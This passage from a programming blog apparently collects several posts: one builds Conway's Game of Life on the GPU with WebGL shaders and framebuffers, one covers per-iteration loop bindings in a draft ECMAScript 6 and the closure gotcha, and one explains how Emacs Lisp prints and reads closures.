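A point is scaled first, then rotated, then translated. For example, with a scale of 2 and a translation of (1, 2), the quad corner (1, 1) ends up at (3, 4).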

To move to 3D graphics from here, I would just need to step up to a mat4 and operate on 3D coordinates instead of 2D. glMatrix would still do the heavy lifting on the CPU side. If this was part of an OpenGL tutorial series, perhaps that’s how it would transition to the next stage.

Conclusion

I’m really happy with how this one turned out. The only way it’s distinguishable from the original applet is that it runs faster. In preparation for this project, I made a big pile of improvements to Igloo, bringing it up to speed with my current WebGL knowledge. This will greatly increase the speed at which I can code up and experiment with future projects. WebGL + Skewer + Igloo has really become a powerful platform for rapid prototyping with OpenGL.

A GPU Approach to Conway's Game of Life

2014-06-10T06:29:48Z

Update: In the next article, I extend this program to solving mazes. The demo has also been ported to the Skew programming language.

Conway’s Game of Life is another well-matched workload for GPUs. Here’s the actual WebGL demo if you want to check it out before continuing.

https://skeeto.github.io/webgl-game-of-life/ (source)

To quickly summarize the rules:

The universe is a two-dimensional grid of 8-connected square cells.
A cell is either dead or alive.
A dead cell with exactly three living neighbors comes to life.
A live cell with fewer than two neighbors dies from underpopulation.
A live cell with more than three neighbors dies from overpopulation.

These simple cellular automata rules lead to surprisingly complex, organic patterns. Cells are updated in parallel, so it’s generally implemented using two separate buffers. This makes it a perfect candidate for an OpenGL fragment shader.
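
As a CPU reference for these rules, here is a minimal two-buffer sketch. The name lifeStep and the flat Uint8Array layout (1 for alive, 0 for dead) are assumptions for illustration, and the grid wraps around at the edges.

```javascript
// Illustrative CPU sketch; lifeStep and the flat array layout are assumptions.
function lifeStep(front, w, h) {
    const back = new Uint8Array(w * h);  // second buffer: never update in place
    for (let y = 0; y < h; y++) {
        for (let x = 0; x < w; x++) {
            let n = 0;  // live cells among the 8 neighbors
            for (let dy = -1; dy <= 1; dy++) {
                for (let dx = -1; dx <= 1; dx++) {
                    if (dx === 0 && dy === 0) continue;
                    n += front[((y + dy + h) % h) * w + (x + dx + w) % w];
                }
            }
            const alive = front[y * w + x] === 1;
            back[y * w + x] = (n === 3 || (alive && n === 2)) ? 1 : 0;
        }
    }
    return back;
}
```

Each output cell depends only on the previous generation, so every iteration of the two outer loops is independent. That independence is what lets the work be spread across fragment shader invocations.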

Preparing the Textures

The entire simulation state will be stored in a single, 2D texture in GPU memory. Each pixel of the texture represents one Life cell. The texture will have the internal format GL_RGBA. That is, each pixel will have a red, green, blue, and alpha channel. This texture is not drawn directly to the screen, so how exactly these channels are used is mostly unimportant. It’s merely a simulation data structure. This is because I’m using the OpenGL programmable pipeline for general computation. I’m calling this the “front” texture.

Four multi-bit (actual width is up to the GPU) channels seems excessive considering that all I really need is a single bit of state for each cell. However, due to framebuffer completion rules, in order to draw onto this texture it must be GL_RGBA. I could pack more than one cell into one texture pixel, but this would reduce parallelism: the shader will run once per pixel, not once per cell.

Because cells are updated in parallel, this texture can’t be modified in-place. It would overwrite important state. In order to do any real work I need a second texture to store the update. This is the “back” texture. After the update, this back texture will hold the current simulation state, so the names of the front and back texture are swapped. The front texture always holds the current state, with the back texture acting as a workspace.

GOL.prototype.swap = function() {
    var tmp = this.textures.front;
    this.textures.front = this.textures.back;
    this.textures.back = tmp;
    return this;
};

Here’s how a texture is created and prepared. It’s wrapped in a function/method because I’ll need two identical textures, making two separate calls to this function. All of these settings are required for framebuffer completion (explained later).

GOL.prototype.texture = function() {
    var gl = this.gl;
    var tex = gl.createTexture();
    gl.bindTexture(gl.TEXTURE_2D, tex);
    gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_S, gl.REPEAT);
    gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_T, gl.REPEAT);
    gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
    gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
    gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA,
                  this.statesize.x, this.statesize.y,
                  0, gl.RGBA, gl.UNSIGNED_BYTE, null);
    return tex;
};

A texture wrap of GL_REPEAT means the simulation will be automatically torus-shaped. The interpolation is GL_NEAREST, because I don’t want to interpolate between cell states at all. The final OpenGL call initializes the texture size (this.statesize). This size is different than the size of the display because, again, this is actually a simulation data structure for my purposes.

The null at the end would normally be texture data. I don’t need to supply any data at this point, so this is left blank. Normally this would leave the texture content in an undefined state, but for security purposes, WebGL will automatically ensure that it’s zeroed. Otherwise there’s a chance that sensitive data might leak from another WebGL instance on another page or, worse, from another process using OpenGL. I’ll make a similar call again later with glTexSubImage2D() to fill the texture with initial random state.

In OpenGL ES, and therefore WebGL, wrapped (GL_REPEAT) texture dimensions must be powers of two, i.e. 512x512, 256x1024, etc. Since I want to exploit the built-in texture wrapping, I’ve decided to constrain my simulation state size to powers of two. If I manually did the wrapping in the fragment shader, I could make the simulation state any size I wanted.
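A small sketch of both options follows. The helper names isPowerOfTwo and wrap are hypothetical: the first validates a state size before relying on GL_REPEAT, and the second shows the arithmetic that manual wrapping would need for arbitrary sizes.

```javascript
// True when n is a positive power of two (1, 2, 4, 8, ...).
function isPowerOfTwo(n) {
    return Number.isInteger(n) && n > 0 && (n & (n - 1)) === 0;
}

// Manual wrapping for arbitrary sizes: maps any integer coordinate
// into [0, size), including negative ones.
function wrap(coord, size) {
    return ((coord % size) + size) % size;
}

isPowerOfTwo(512);  // => true
isPowerOfTwo(300);  // => false
wrap(-1, 300);      // => 299
wrap(300, 300);     // => 0
```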

Framebuffers

A framebuffer is the target of the current glClear(), glDrawArrays(), or glDrawElements(). The user’s display is the default framebuffer. New framebuffers can be created and used as drawing targets in place of the default framebuffer. This is how things are drawn off-screen without affecting the display.

A framebuffer by itself is nothing but an empty frame. It needs a canvas. Other resources are attached in order to make use of it. For the simulation I want to draw onto the back buffer, so I attach this to a framebuffer. If this framebuffer is bound at the time of the draw call, the output goes onto the texture. This is really powerful because this texture can be used as an input for another draw command, which is exactly what I’ll be doing later.

Here’s what making a single step of the simulation looks like.

GOL.prototype.step = function() {
    var gl = this.gl;
    gl.bindFramebuffer(gl.FRAMEBUFFER, this.framebuffers.step);
    gl.framebufferTexture2D(gl.FRAMEBUFFER, gl.COLOR_ATTACHMENT0,
                            gl.TEXTURE_2D, this.textures.back, 0);
    gl.viewport(0, 0, this.statesize.x, this.statesize.y);
    gl.bindTexture(gl.TEXTURE_2D, this.textures.front);
    this.programs.gol.use()
        .attrib('quad', this.buffers.quad, 2)
        .uniform('state', 0, true)
        .uniform('scale', this.statesize)
        .draw(gl.TRIANGLE_STRIP, 4);
    this.swap();
    return this;
};

First, bind the custom framebuffer as the current framebuffer with glBindFramebuffer(). This framebuffer was previously created with glCreateFramebuffer() and required no initial configuration. The configuration is entirely done here, where the back texture is attached to the current framebuffer. This replaces any texture that might currently be attached to this spot — like the front texture from the previous iteration. Finally, the size of the drawing area is locked to the size of the simulation state with glViewport().

Using Igloo again to keep the call concise, a fullscreen quad is rendered so that the fragment shader runs exactly once for each cell. That state uniform is the front texture, bound as GL_TEXTURE0.

With the drawing complete, the buffers are swapped. Since every pixel was drawn, there’s no need to ever use glClear().
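Since framebuffer completeness decides whether the draw call works at all, it can be worth checking once after attaching the texture. The helper below is a hypothetical addition, not something the demo does. It relies only on the standard checkFramebufferStatus() call and the FRAMEBUFFER_COMPLETE constant.

```javascript
// Hypothetical helper: throw if the currently bound framebuffer can't be
// drawn to. `gl` is a WebGLRenderingContext.
function assertFramebufferComplete(gl) {
    var status = gl.checkFramebufferStatus(gl.FRAMEBUFFER);
    if (status !== gl.FRAMEBUFFER_COMPLETE) {
        throw new Error('incomplete framebuffer: 0x' + status.toString(16));
    }
}
```

Calling this right after gl.framebufferTexture2D() in step() would turn a silent failure into an exception during development.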

The Game of Life Fragment Shader

The simulation rules are coded entirely in the fragment shader. After initialization, JavaScript’s only job is to make the appropriate glDrawArrays() call over and over. To run different cellular automata, all I would need to do is modify the fragment shader and generate an appropriate initial state for it.

uniform sampler2D state;
uniform vec2 scale;

int get(int x, int y) {
    return int(texture2D(state, (gl_FragCoord.xy + vec2(x, y)) / scale).r);
}

void main() {
    int sum = get(-1, -1) +
              get(-1,  0) +
              get(-1,  1) +
              get( 0, -1) +
              get( 0,  1) +
              get( 1, -1) +
              get( 1,  0) +
              get( 1,  1);
    if (sum == 3) {
        gl_FragColor = vec4(1.0, 1.0, 1.0, 1.0);
    } else if (sum == 2) {
        float current = float(get(0, 0));
        gl_FragColor = vec4(current, current, current, 1.0);
    } else {
        gl_FragColor = vec4(0.0, 0.0, 0.0, 1.0);
    }
}

The get(int, int) function returns the value of the cell at offset (x, y) from the current cell, 0 or 1. For the sake of simplicity, the output of the fragment shader is solid white and black, but just sampling one channel (red) is good enough to know the state of the cell. I’ve learned that loops and arrays are troublesome in GLSL, so I’ve manually unrolled the neighbor check. Cellular automata that have more complex state could make use of the other channels and perhaps even exploit alpha channel blending in some special way.

Otherwise, this is just a straightforward encoding of the rules.
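The shader has three branches while the rule summary has three rules phrased differently, so it's worth confirming they agree. This sketch transcribes the shader's branches into JavaScript and compares them against the listed rules for every possible input. Both function names are made up for the comparison.

```javascript
// The shader's branch structure, transcribed to JavaScript.
function shaderRule(sum, current) {
    if (sum === 3) return 1;
    if (sum === 2) return current;
    return 0;
}

// The rules as listed in the summary.
function listedRule(sum, current) {
    if (current === 0) return sum === 3 ? 1 : 0;  // birth
    if (sum < 2) return 0;                         // underpopulation
    if (sum > 3) return 0;                         // overpopulation
    return 1;                                      // survives with 2 or 3
}

// Compare every possible input: 9 neighbor counts times 2 states.
let mismatches = 0;
for (let sum = 0; sum <= 8; sum++) {
    for (let current = 0; current <= 1; current++) {
        if (shaderRule(sum, current) !== listedRule(sum, current)) {
            mismatches++;
        }
    }
}
console.log(mismatches);  // prints 0
```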

Displaying the State

What good is the simulation if the user doesn’t see anything? So far all of the draw calls have been done on a custom framebuffer. Next I’ll render the simulation state to the default framebuffer.

GOL.prototype.draw = function() {
    var gl = this.gl;
    gl.bindFramebuffer(gl.FRAMEBUFFER, null);
    gl.viewport(0, 0, this.viewsize.x, this.viewsize.y);
    gl.bindTexture(gl.TEXTURE_2D, this.textures.front);
    this.programs.copy.use()
        .attrib('quad', this.buffers.quad, 2)
        .uniform('state', 0, true)
        .uniform('scale', this.viewsize)
        .draw(gl.TRIANGLE_STRIP, 4);
    return this;
};

First, bind the default framebuffer as the current buffer. There’s no actual handle for the default framebuffer, so using null sets it to the default. Next, set the viewport to the size of the display. Then use the “copy” program to copy the state to the default framebuffer where the user will see it. One pixel per cell is far too small, so it will be scaled as a consequence of this.viewsize being four times larger.

Here’s what the “copy” fragment shader looks like. It’s so simple because I’m storing the simulation state in black and white. If the state was in a different format than the display format, this shader would need to perform the translation.

uniform sampler2D state;
uniform vec2 scale;

void main() {
    gl_FragColor = texture2D(state, gl_FragCoord.xy / scale);
}

Since I’m scaling up by four — i.e. 16 pixels per cell — this fragment shader is run 16 times per simulation cell. Since I used GL_NEAREST on the texture there’s no funny business going on here. If I had used GL_LINEAR, it would look blurry.

You might notice I’m passing in a scale uniform and using gl_FragCoord. The gl_FragCoord variable is in window-relative coordinates, but when I sample a texture I need unit coordinates: values between 0 and 1. To get this, I divide gl_FragCoord by the size of the viewport. Alternatively I could pass the coordinates as a varying from the vertex shader, automatically interpolated between the quad vertices.
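To make the coordinate math concrete, here is the same calculation on the CPU. The function cellForPixel is hypothetical. It assumes gl_FragCoord reports pixel centers (the pixel index plus 0.5) and that GL_NEAREST selects the texel containing the sampled point.

```javascript
// Which state cell does display pixel (px, py) sample?
// Mirrors the copy shader: take the pixel center, divide by the viewport
// size to get unit coordinates, then find the texel containing that point.
function cellForPixel(px, py, viewsize, statesize) {
    const u = (px + 0.5) / viewsize.x;
    const v = (py + 0.5) / viewsize.y;
    return {
        x: Math.floor(u * statesize.x),
        y: Math.floor(v * statesize.y)
    };
}

const statesize = {x: 256, y: 256};
const viewsize = {x: 1024, y: 1024};  // four times larger
cellForPixel(0, 0, viewsize, statesize);  // => {x: 0, y: 0}
cellForPixel(3, 3, viewsize, statesize);  // => {x: 0, y: 0}
cellForPixel(4, 0, viewsize, statesize);  // => {x: 1, y: 0}
```

Pixels 0 through 3 along each axis land in cell 0, which is the 4x4 block of 16 display pixels per cell.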

An important thing to notice is that the simulation state never leaves the GPU. It’s updated there and it’s drawn there. The CPU is operating the simulation like the strings on a marionette — from a thousand feet up in the air.

User Interaction

What good is a Game of Life simulation if you can’t poke at it? If all of the state is on the GPU, how can I modify it? This is where glTexSubImage2D() comes in. As its name implies, it’s used to set the values of some portion of a texture. I want to write a poke() method that uses this OpenGL function to set a single cell.

GOL.prototype.poke = function(x, y, value) {
    var gl = this.gl,
        v = value * 255;
    gl.bindTexture(gl.TEXTURE_2D, this.textures.front);
    gl.texSubImage2D(gl.TEXTURE_2D, 0, x, y, 1, 1,
                     gl.RGBA, gl.UNSIGNED_BYTE,
                     new Uint8Array([v, v, v, 255]));
    return this;
};

Bind the front texture, set the region at (x, y) of size 1x1 (a single pixel) to a very specific RGBA value. There’s nothing else to it. If you click on the simulation in my demo, it will call this poke method. This method could also be used to initialize the entire simulation with random values, though it wouldn’t be very efficient doing it one pixel at a time.
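For bulk initialization, one option is to build the whole RGBA array on the CPU and upload it with a single call. This is a sketch under assumptions: randomState and setState are hypothetical names, and the optional rand parameter exists only so a seeded generator can be swapped in.

```javascript
// Build RGBA bytes for a w-by-h state where each cell is alive with
// probability p. `rand` defaults to Math.random.
function randomState(w, h, p, rand) {
    rand = rand || Math.random;
    const rgba = new Uint8Array(w * h * 4);
    for (let i = 0; i < w * h; i++) {
        const v = rand() < p ? 255 : 0;
        rgba[i * 4 + 0] = v;
        rgba[i * 4 + 1] = v;
        rgba[i * 4 + 2] = v;
        rgba[i * 4 + 3] = 255;
    }
    return rgba;
}

// Upload in one call, covering the whole texture instead of one pixel.
// `gl` is a WebGLRenderingContext and `texture` a w-by-h RGBA texture.
function setState(gl, texture, w, h, rgba) {
    gl.bindTexture(gl.TEXTURE_2D, texture);
    gl.texSubImage2D(gl.TEXTURE_2D, 0, 0, 0, w, h,
                     gl.RGBA, gl.UNSIGNED_BYTE, rgba);
}
```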

Getting the State

What if you wanted to read the simulation state into CPU memory, perhaps to store for reloading later? So far I can set the state and step the simulation, but there’s been no way to get at the data. Unfortunately I can’t directly access texture data. There’s nothing like the inverse of glTexSubImage2D(). Here are a few options:

Call toDataURL() on the canvas. This would grab the rendering of the simulation, which would need to be translated back into simulation state. Sounds messy.
Take a screenshot. Basically the same idea, but even messier.
Use glReadPixels() on a framebuffer. The texture can be attached to a framebuffer, then read through the framebuffer. This is the right solution.

I’m reusing the “step” framebuffer for this since it’s already intended for these textures to be its attachments.

GOL.prototype.get = function() {
    var gl = this.gl, w = this.statesize.x, h = this.statesize.y;
    gl.bindFramebuffer(gl.FRAMEBUFFER, this.framebuffers.step);
    gl.framebufferTexture2D(gl.FRAMEBUFFER, gl.COLOR_ATTACHMENT0,
                            gl.TEXTURE_2D, this.textures.front, 0);
    var rgba = new Uint8Array(w * h * 4);
    gl.readPixels(0, 0, w, h, gl.RGBA, gl.UNSIGNED_BYTE, rgba);
    return rgba;
};

Voilà! This rgba array can be passed directly back to glTexSubImage2D() as a perfect snapshot of the simulation state.
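If the snapshot is going to be stored, three of every four bytes are redundant. A possible reduction to one byte per cell, and the expansion back, might look like the following. The names toCells and toRGBA are hypothetical.

```javascript
// Reduce an RGBA snapshot to one byte per cell by reading the red channel.
function toCells(rgba) {
    const cells = new Uint8Array(rgba.length / 4);
    for (let i = 0; i < cells.length; i++) {
        cells[i] = rgba[i * 4] ? 1 : 0;
    }
    return cells;
}

// Expand cells back to RGBA, ready for an upload.
function toRGBA(cells) {
    const rgba = new Uint8Array(cells.length * 4);
    for (let i = 0; i < cells.length; i++) {
        const v = cells[i] * 255;
        rgba.set([v, v, v, 255], i * 4);
    }
    return rgba;
}
```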

Conclusion

This project turned out to be far simpler than I anticipated, so much so that I was able to get the simulation running within an evening’s effort. I learned a whole lot more about WebGL in the process, enough for me to revisit my WebGL liquid simulation. It uses a similar texture-drawing technique, which I really fumbled through that first time. I dramatically cleaned it up, making it fast enough to run smoothly on my mobile devices.

Also, this Game of Life implementation is blazing fast. If rendering is skipped, it can run a 2048x2048 Game of Life at over 18,000 iterations per second! However, this isn’t terribly useful because it hits its steady state well before that first second has passed.

Per Loop vs. Per Iteration Bindings

2014-06-06T20:18:58Z

The April 5th, 2014 draft of the ECMA-262 6th Edition specification (a.k.a. the next major version of JavaScript/ECMAScript) contained a subtle, though very significant, change to the semantics of the for loop (13.6.3.3). Loop variables are now fresh bindings for each iteration of the loop: a per-iteration binding. Previously loop variables were established once for the entire loop, a per-loop binding. The purpose is an attempt to fix an old gotcha that affects many languages.

If you couldn’t already tell, this is going to be another language lawyer post!

Backup to C

To try to explain what this all means in plain English, let’s step back a moment and discuss what a for loop really is. I can’t find a source for this, but I’m pretty confident the three-part for loop originated in K&R C.

for (INITIALIZATION; CONDITION; ITERATION) {
    BODY;
}

Evaluate INITIALIZATION.
Evaluate CONDITION. If zero (false), exit the for.
Evaluate BODY.
Evaluate ITERATION and go to 2.
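The four steps can be written out by hand. The sketch below uses JavaScript rather than C, with var so that no extra scopes get involved. The function names are made up for the comparison.

```javascript
function viaFor(count) {
    var out = [];
    for (var i = 0; i < count; i++) {
        out.push(i);
    }
    return out;
}

function viaSteps(count) {
    var out = [];
    var i = 0;              // 1. INITIALIZATION
    while (i < count) {     // 2. CONDITION: exit when false
        out.push(i);        // 3. BODY
        i++;                // 4. ITERATION, then back to step 2
    }
    return out;
}

viaFor(3);    // => [0, 1, 2]
viaSteps(3);  // => [0, 1, 2]
```

The hand-written version is only equivalent when the body has no continue statement, since a continue in the while form would skip step 4.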

In the original C, and all the way up to C89, no variable declarations were allowed in the initialization expression. I can understand why: there’s a subtle complication, though it’s harmless in C. We’ll get to that soon. Here’s a typical C89 for loop.

int count = 10;
/* ... */
int i;
for (i = 0; i < count; i++) {
    double foo;
    /* ... */
}

The variable i is established independent of the loop, in the scope outside the for loop, alongside count. This isn’t even a per-loop binding. As far as the language is concerned, it’s just a variable that the loop happens to access and mutate. It’s very assembly-language-like. Because C has block scoping, the body of the for loop is another nested scope. The variable foo is in this scope, reestablished on each iteration of the loop (per-iteration).

As an implementation detail, foo will reside at the same location on the stack each time around the loop. If it’s accessed before being initialized, it will probably hold the value from the previous iteration, but, as far as the language is concerned, this is just a happy, though undefined, coincidence.

C99 Loops

Fast forward to the end of the 20th century. At this point, other languages have allowed variable declarations in the initialization part for years, so it’s time for C to catch up with C99.

int count = 10;
/* ... */
for (int i = 0; i < count; i++) {
    double foo;
    /* ... */
}

Now consider this: in what scope is the variable i? The outer scope as before? The iteration scope with foo? The answer is neither. In order to make this work, a whole new loop scope is established in between: a per-loop binding. This scope holds for the entire duration of the loop.

The variable i is constrained to the for loop without being limited to the iteration scope. This is important because i is what keeps track of the loop’s progress. The semantic equivalent in C89 makes the additional scope explicit with a block.

int count = 10;
/* ... */
{
    int i;
    for (i = 0; i < count; i++) {
        double foo;
        /* ... */
    }
}

This, ladies and gentlemen, is the C-style 3-part for loop. Every language that has this statement, and has block scope, follows these semantics. This included JavaScript up until two months ago, where the draft now gives it its own unique behavior.

JavaScript’s Let

As it exists today in its practical form, little of the above is relevant to JavaScript. JavaScript has no block scope, just function scope. A three-part for-loop doesn’t establish all these scopes, because scopes like these are absent from the language.

An important change coming with 6th edition is the introduction of let declarations. Variables declared with let will have block scope.

let count = 10;
// ...
for(let i = 0; i < count; i++) {
    let foo;
    // ...
}
console.log(foo); // error
console.log(i);   // error

If these variables had been declared with var, the last two lines wouldn’t be errors (or worse, global references). count, i, and foo would all be in the same function-level scope. This is really great! I look forward to using let exclusively someday.
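A side-by-side sketch of the difference, with both loops wrapped in functions so nothing leaks into the global scope. It assumes an engine that supports let, and the function names are illustrative only.

```javascript
function withVar() {
    for (var i = 0; i < 3; i++) {
        var foo = i * 2;
    }
    return [i, foo];  // both still visible: function scope
}

function withLet() {
    for (let i = 0; i < 3; i++) {
        let foo = i * 2;
    }
    try {
        return [i, foo];
    } catch (e) {
        return e.name;  // neither name exists out here
    }
}

withVar();  // => [3, 4]
withLet();  // => "ReferenceError"
```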

The Closure Trap

I mentioned a subtle complication. Most of the time programmers don’t need to consider or even be aware of this middle scope. However, when combined with closures it suddenly becomes an issue. Here’s an example with Perl,

my @closures;
for (my $i = 0; $i < 2; $i++) {
    push(@closures, sub { return $i; });
}
$closures[0]();  # => 2
$closures[1]();  # => 2

Here’s one with Python. Python lacks a three-part for loop, but its standard for loop has similar semantics.

closures = []
for i in xrange(2):
    closures.append(lambda: i)
closures[0]()  # => 1
closures[1]()  # => 1

And now Ruby.

closures = []
for i in (0..1)
  closures << lambda { i }
end
closures[0].call  # => 1
closures[1].call  # => 1

In all three cases, one closure is created per iteration. Each closure captures the loop variable i. It’s easy to make the mistake of thinking each closure will return a unique value. However, as pointed out above, this is a per-loop variable, existing in a middle scope. The closures all capture the same variable, merely bound to different values at the time of capture. The solution is to establish a new variable in the iteration scope and capture that instead. Below, I’ve established a $value variable for this.

my @closures;
for (my $i = 0; $i < 2; $i++) {
    my $value = $i;
    push(@closures, sub { return $value; });
}
$closures[0]();  # => 0
$closures[1]();  # => 1

This is something that newbies easily get tripped up on. Because they’re still trying to wrap their heads around the closure concept, this looks like some crazy bug in the interpreter/compiler. I can understand why the ECMA-262 draft was changed to accommodate this situation.
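The same trap exists in JavaScript with var. Since var has no iteration scope to hold a $value-style copy, the traditional fix is an immediately-invoked function. A sketch, with hypothetical function names:

```javascript
function trap() {
    var closures = [];
    for (var i = 0; i < 2; i++) {
        closures.push(function() { return i; });
    }
    return closures.map(function(f) { return f(); });
}

function fixed() {
    var closures = [];
    for (var i = 0; i < 2; i++) {
        // Each call creates a new scope, so each closure gets its own
        // `value` holding the loop variable's value at that moment.
        (function(value) {
            closures.push(function() { return value; });
        }(i));
    }
    return closures.map(function(f) { return f(); });
}

trap();   // => [2, 2]
fixed();  // => [0, 1]
```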

The JavaScript Workaround

The language in the new draft has two items called perIterationBindings and CreatePerIterationEnvironment (in case you’re searching for the relevant part of the spec). Like the $value example above, for loops in JavaScript with “lexical” (i.e. let) loop bindings will implicitly mask the loop variable with a variable of the same name in the iteration scope.

let closures = [];
for (let i = 0; i < 2; i++) {
    closures.push(function() { return i; });
}

/* Before the change: */
closures[0]();  // => 2
closures[1]();  // => 2

/* After the change: */
closures[0]();  // => 0
closures[1]();  // => 1

Note: If you try to run this yourself, note that at the time of this writing, the only JavaScript implementation I could find that updated to the latest draft was Traceur. You’ll probably see the “before” behavior for now.

You can’t see it (I said it’s implicit!), but under an updated JavaScript implementation there are actually two i variables here. The closures capture the innermost i, the per-iteration version of i. Let’s go back to the original example, JavaScript-style.

let count = 10;
// ...
for (let i = 0; i < count; i++) {
    let foo;
   // ...
}

Here’s what the scope looks like for the latest draft. Notice the second i in the iteration scope. The inner i is initially assigned to the value of the outer i.

We could emulate this in an older edition. Imagine writing a macro to do this.

let count = 10;
// ...
for (let i = 0; i < count; i++) {
    let __i = i;  // (possible name collision)
    {
        let i = __i;
        let foo;
        // ...
    }
}

I have to use __i to smuggle the value across scopes without having i reference itself. Unlike Lisp’s let, the assignment value for var and let is evaluated in the nested scope, not the outer scope.

Each iteration gets its own i. But what happens when the loop modifies i? Simple, it’s copied back out at the end of the body.

let count = 10;
// ...
for (let i = 0; i < count; i++) {
    let __i = i;
    {
        let i = __i;
        let foo;
        // ...
        __i = i;
    }
    i = __i;
}

Now all the expected for semantics work — the body can also update the loop variable — but we still get the closure-friendly per-iteration variables.
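The copy-out can be observed directly on an implementation with per-iteration bindings. In this sketch (the function name is made up) the body advances i as well, so the loop runs three times instead of six, and each closure sees its own iteration's i, including the body's increment.

```javascript
function demo() {
    const closures = [];
    for (let i = 0; i < 6; i++) {
        closures.push(function() { return i; });
        i++;  // the body also advances the loop variable
    }
    return closures.map(function(f) { return f(); });
}

demo();  // => [1, 3, 5]
```

The loop's own i++ is applied to the next iteration's fresh copy, which is why the captured values are 1, 3, and 5 rather than 2, 4, and 6.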

Conclusion

I’m still not sure if I really like this change. It’s a clean fix, but the gotcha hasn’t been eliminated. Instead it’s been inverted. Someday someone will have the unusual circumstance of wanting to capture the loop variable itself, and will run into some surprising behavior. Because the semantics are a lot more complicated, it’s hard to reason about what’s not working unless you already know JavaScript has magical for loops.

Perl and C# each also gained per-iteration bindings in their history, but rather than complicate or change their standard for loops, they instead introduced it as a new syntactic construction: foreach.

my @closures;
foreach my $i (0, 1) {
    push(@closures, sub { return $i; });
}
$closures[0]();  # => 0
$closures[1]();  # => 1

In this case, per-iteration bindings definitely make sense. The variable $i is established and bound to each value in turn. As far as control flow goes, it’s very functional. The binding is never actually mutated.

I think it could be argued that Python and Ruby’s for ... in forms should behave like this foreach. These were probably misdesigned early on, but it’s not possible to change their semantics at this point. Because JavaScript’s var was improperly designed from the beginning, let offers the opportunity to fix more than just var. We’re seeing this right now with these new for semantics.

Emacs Lisp Readable Closures

2013-12-30T23:52:38Z

I’ve stated before that one of the unique features of Emacs Lisp is that its closures are readable. Closures can be serialized by the printer and read back in with the reader. I am unaware of any other programming language that has this feature. In fact it’s essential for Elisp byte-code compilation because byte-compiled Elisp files are merely s-expressions of byte-code dumped out as source.

Lisp Printing

The Lisp family of languages is homoiconic. Lisp source code is written in the syntax of its own data structures, s-expressions. Since a compiler/interpreter is usually provided at run-time, a consequence of this is that reading and printing are a fundamental feature of Lisps. A value can be handed to the printer, which will serialize the value into an s-expression as a sequence of characters. Later on the reader can parse the s-expression back into an equal value.

To compare, JavaScript originally had half of this in place. JavaScript has convenient object syntax for defining an associative array, known today as JSON. The eval function could (dangerously) be used as a reader for parsing a string containing JSON-encoded data into a value. But until JSON.stringify() became standard, developers had to write their own printer. Lisp s-expression syntax is much more powerful (and complicated) than JSON, maintaining both identity and cycles (e.g. *print-circle*).
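A quick sketch of where the JSON printer and reader stop short, using only the standard JSON.stringify() and JSON.parse(). The variable names are illustrative.

```javascript
// Printer and reader: a round trip through text.
const value = {name: 'foo', list: [1, 2, 3]};
const text = JSON.stringify(value);  // '{"name":"foo","list":[1,2,3]}'
const copy = JSON.parse(text);

// Identity is lost: two references to one array become two arrays.
const shared = [1, 2];
const pair = JSON.parse(JSON.stringify({a: shared, b: shared}));
pair.a === pair.b;  // => false

// Cycles are rejected outright.
const cycle = {};
cycle.self = cycle;
let cycleError = null;
try {
    JSON.stringify(cycle);
} catch (e) {
    cycleError = e.name;  // "TypeError"
}

// Functions, closures included, are silently dropped.
JSON.stringify({f: function() { return 1; }});  // => '{}'
```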

Not all values can be read. They’ll still print (when *print-readably* is nil) but will do so using special syntax that will signal an error in the reader: #<. For example, in Emacs Lisp buffers cannot be serialized so they print using this syntax.

(prin1-to-string (current-buffer))
;; => "#<buffer *scratch*>"

It doesn’t matter what’s between the angle brackets, or even that there’s a closing angle bracket. The reader will signal an error as soon as it hits a #<.

Almost Everything Prints Readably

Elisp has a small set of primitive data types. All of these primitive types print readably:

integer (1024, ?a)
float (1.7)
cons/list ((...))
vector (one-dimensional, [...])
bool-vector (#&n"...")
string ("...")
char-table (#^[...])
hash-table (readable as of Emacs 23.3, #s(hash-table ...))
byte-code function object (#[...])
symbol

Here are all the non-readable types. Each one has a good reason for not being serializable.

buffer
process (external state)
frame (user interface element)
marker (live, automatically updates)
overlay (belongs to a buffer)
built-in functions (native code)
user-ptr (opaque pointers from Emacs 25 dynamic modules)

And that’s it. Every other value in Elisp is constructed from one or more of these primitives, including keymaps, functions, macros, syntax tables, defstruct structs, and EIEIO objects. This means that as long as these values don’t refer to an unreadable value, they themselves can be printed.

An interesting note here is that, unlike the Common Lisp Object System (CLOS), EIEIO objects are readable by default. To Elisp they’re just vectors, so of course they print. CLOS objects are unreadable without manually defining a print method per class.

Elisp Closures

Elisp got lexical scoping in Emacs 24, released in June 2012. It’s now one of the relatively few languages to have both dynamic and lexical scope. Like Common Lisp, variables declared with defvar (and family) continue to have dynamic scope. For backwards compatibility with old Lisp code, lexical scope is disabled by default. It’s enabled for a specific file or buffer by setting lexical-binding to non-nil.

With lexical scope, anonymous functions become closures, a powerful functional programming primitive: a function plus a captured lexical environment. It also provides some performance benefits. In my own tests, compiled Elisp with lexical scope enabled is about 10% to 15% faster than with the default dynamic scope.

What do closures look like in Emacs Lisp? It takes on two forms depending on whether the closure is compiled or not. For example, consider this function, foo, that takes two arguments and returns a closure that returns the first argument.

;; -*- lexical-binding: t; -*-
(defun foo (x y)
  (lambda () x))

(foo :bar :ignored)
;; => (closure ((y . :ignored) (x . :bar) t) () x)

An uncompiled closure is a list beginning with the symbol closure. The second element is the lexical environment, the third is the argument list (lambda list), and the rest is the body of the function. Here we can see that both x and y have been “closed over.” This is a little bit sloppy because the function never makes use of y. Capturing it has a few problems.

The closure has a larger footprint than necessary.
Values are held longer than necessary, delaying collection.
It affects the readability of the closure, which I’ll get to later.

Fortunately the compiler is smart enough to see this and will avoid capturing unused variables. To prove this, I’ve now compiled foo so that it returns a compiled closure.

(foo :bar :ignored)
;; => #[0 "\300\207" [:bar] 1]

What’s returned here is a byte-code function object, with the #[...] syntax. It has these elements:

The function’s lambda list (zero arguments)
Byte-codes stored in a unibyte string
Constants vector
Maximum stack space needed by this function

Notice that the lexical environment has been captured in the constants vector, specifically noting the lack of :ignored in this vector. The compiler didn’t capture it.

For those curious about the byte-code here’s an explanation. The string syntax shown is in octal, representing a string containing two bytes: 192 and 135. The Elisp byte-code interpreter is stack-based. The 192 (constant 0) says to push the first constant onto the stack. The 135 (return) says to pop the top element from the stack and return it.

(coerce "\300\207" 'list)
;; => (192 135)

